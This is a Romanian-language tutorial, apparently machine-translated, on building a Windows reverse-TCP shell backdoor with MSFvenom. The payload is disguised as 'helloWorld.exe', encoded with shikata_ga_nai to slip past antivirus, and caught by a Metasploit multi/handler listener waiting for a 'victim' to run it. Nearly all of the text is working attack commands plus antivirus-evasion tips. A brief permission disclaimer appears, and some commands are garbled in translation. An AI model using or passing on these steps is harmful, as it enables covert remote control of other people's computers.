O ușă din spate este utilizată pentru a ocoli mecanismele de securitate, adesea în secret și mai ales nedetectabil. Folosind MSFvenom, combinația dintre msfpayload și msfencode, este posibil să se creeze o ușă din spate care să se conecteze înapoi la atacator folosind TCP revers shell. Pentru a dezvolta un backdoor, trebuie să schimbați semnătura malware-ului dvs. pentru a evita orice software antivirus. Finalizați acest proiect pe o pereche de computere pe care aveți permisiunea de a le accesa și, în acest proces, veți afla mai multe despre securitatea computerului și cum funcționează acest tip de backdoor.
Pași
Pasul 1. Porniți Kali și porniți consola Terminal
Pasul 2. Tastați ifconfig pentru a afișa interfața și verificați adresa IP
Pasul 3. Tastați codificatoarele msfvenom -l pentru a afișa lista codificatoarelor
Veți utiliza x86 / shikata_ga_nai ca codificator
Pasul 4. Tastați „msfvenom -a x86 --platform windows -p windows / shell / reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86 / shikata_ga_nai -f exe> helloWorld.exe
- -a x86 --platform windows desemnează arhitectura de utilizat.
- -p windows / shell / reverse_tcp desemnează sarcinile utile de încorporat.
- LHOST desemnează adresa IP a ascultătorului.
- LPORT desemnează portul ascultător.
- -b "\ x00" desemnează pentru a evita caracterul rău (octeți nuli).
- -e x86 / shikata_ga_nai desemnează numele codificatoarelor.
- -f exe> helloWorld.exe desemnează ieșirea formatului.
Pasul 5. Tastați msfconsole pentru a activa Metasploit
Acum v-ați generat ușa din spate. Când victima face clic pe helloWorld.exe, sarcina utilă a shell-ului care este încorporată va fi activată și va face o conexiune înapoi la sistemul dvs. Pentru a primi conexiunea, trebuie să deschideți multi-handlerul în Metasploit și să setați sarcinile utile
Pasul 6. Tastați use exploit / multi / handler
Pasul 7. Tastați set payload windows / shell / reverse_tcp
Pasul 8. Tastați show options pentru a verifica modulul
Pasul 9. Tastați setul LHOST 192.168.48.129
„LHOST” desemnează adresa IP a ascultătorului
Pasul 10. Tastați setul LPORT 4444
„LPORT” desemnează portul ascultător
Pasul 11. Tastați rulați și așteptați conexiunea de la mașina victimei
Pasul 12. Așteptați ca victima să facă clic pe helloWorld.exe
Apoi veți fi conectat cu succes la aparatul victimei.
sfaturi
- Utilizarea -i în MSFvenom va reprezenta iterațiile codării. Uneori, mai multe iterații pot ajuta la evitarea software-ului AV.
- Ați învățat cum să generați backdoor-ul și codificați folosind MSFvenom, dar această metodă nu va funcționa perfect împotriva unor programe AV în zilele noastre. Motivul din spatele acestui lucru se datorează șabloanelor de execuție din MSFvenom. Furnizorii AV au adăugat semnătura statică a acestor șabloane și doar le caută. Soluția pentru această problemă este utilizarea unui șablon de execuție diferit sau a unor instrumente diferite.